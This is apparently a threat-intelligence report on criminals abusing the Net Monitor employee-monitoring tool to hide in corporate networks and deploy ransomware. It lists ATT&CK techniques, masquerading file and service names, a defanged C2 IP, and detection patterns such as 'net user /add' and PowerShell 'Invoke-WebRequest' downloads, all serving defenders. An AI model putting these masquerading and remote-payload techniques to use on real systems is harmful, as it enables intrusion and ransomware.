Full Report
As if snooping on your workers wasn't bad enough Your supervisor may like using employee monitoring apps to keep tabs on you, but crims like the snooping software even more. Threat actors are now using legit bossware to blend into corporate networks and attempt ransomware deployment.…
Analysis Summary
# Tool/Technique: Net Monitor for Employees Professional (Abuse of Bossware)
## Overview
Threat actors are increasingly leveraging legitimate Remote Monitoring and Management (RMM) tools and "bossware" (employee monitoring software) to maintain persistence and move laterally within corporate networks. By using Net Monitor for Employees Professional, attackers can blend in with legitimate administrative traffic, execute remote commands, and deploy ransomware while evading traditional security detections that often whitelist signed, commercial binaries.
## Technical Details
- **Type:** Legit Tool / Living-off-the-Land (LotL)
- **Platform:** Windows
- **Capabilities:** Remote screen monitoring, remote shell access, command execution, file transfer, and process hiding.
- **First Seen:** Incidents reported in late January and early February 2026.
## MITRE ATT&CK Mapping
- **[TA0003 - Persistence]**
- [T1543.003 - Create or Modify System Process: Windows Service]
- **[TA0005 - Defense Evasion]**
- [T1036.005 - Masquerading: Match Legitimate Name or Location]
- [T1562.001 - Impair Defenses: Disable or Modify Tools]
- **[TA0007 - Discovery]**
- [T1018 - Remote System Discovery]
- [T1087 - Account Discovery]
- **[TA0009 - Collection]**
- [T1113 - Screen Capture]
- **[TA0011 - Command and Control]**
- [T1219 - Remote Access Software]
## Functionality
### Core Capabilities
- **Stealth Monitoring:** Passive screen viewing to observe user activity and sensitive data.
- **Remote Shell:** Establishing terminal connections to execute `net` commands for account discovery and password resets.
- **File Distribution:** Pulling down additional payloads (e.g., SimpleHelp RMM or Ransomware) via PowerShell.
### Advanced Features
- **Customizable Identity:** The tool allows attackers to rename the service and binary. In observed cases, it was disguised as "Microsoft OneDrive" (`OneDriveSvc` / `OneDriver.exe`).
- **Keyword Monitoring:** Used in conjunction with RMM tools to trigger alerts when victims access cryptocurrency wallets or technical remote access tools (RDP, VNC, AnyDesk).
## Indicators of Compromise
- **File Hashes:**
- *Note: Specific hashes for the legitimate binary vary by version; focus on behavioral indicators.*
- **File Names:**
- `vhost.exe` (Used for SimpleHelp delivery)
- `OneDriver.exe` (Masqueraded Net Monitor binary)
- `svchost.exe` (Renamed running binary in non-standard paths)
- **Registry Keys:**
- Services registered as `OneDriveSvc` (when used maliciously).
- **Network Indicators:**
- `160.191.182[.]41` (C2/Payload Delivery)
- **Behavioral Indicators:**
- `net.exe` commands used for rapid account manipulation (identifying admins, resetting passwords).
- PowerShell sessions downloading executables from external IP addresses.
- Unexpected installation of monitoring agents on systems where no corporate policy for "bossware" exists.
## Associated Threat Actors
- **VoidCrypt (Affiliates):** Specifically linked through the attempted deployment of **Crazy ransomware**.
- **Unidentified Financially Motivated Actors:** Groups targeting cryptocurrency wallets alongside ransomware.
## Detection Methods
- **Signature-based detection:** Modern EDRs may flag the specific Net Monitor installer if not digitally signed by a trusted internal cert, though the binary itself is often "clean."
- **Behavioral detection:**
- Monitor for `svchost.exe` executing from unusual directories or with unusual parent processes (e.g., a monitoring agent).
- Alert on the creation of new administrative accounts via `net user /add` following the installation of RMM software.
- Detect unauthorized PowerShell downloads (`Invoke-WebRequest`) from known-bad or suspicious IPs.
## Mitigation Strategies
- **Identity Security:** Enforce Multi-Factor Authentication (MFA) on all VPN and remote access gateways to prevent initial entry via compromised credentials.
- **Software Restriction Policies:** Implement AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unauthorized RMM or monitoring tools.
- **Audit & Inventory:** Regularly audit installed software to check for "Shadow IT" or unauthorized monitoring tools like Net Monitor or SimpleHelp.
- **Principle of Least Privilege:** Limit the ability of standard users to install services or modify system-level binaries.
## Related Tools/Techniques
- **SimpleHelp:** A legitimate RMM tool frequently abused for persistence.
- **AnyDesk/TeamViewer:** Often used in similar "living-off-the-land" remote access attacks.
- **VoidCrypt/Crazy Ransomware:** The final payload delivered after the environment was prepared using the monitoring tools.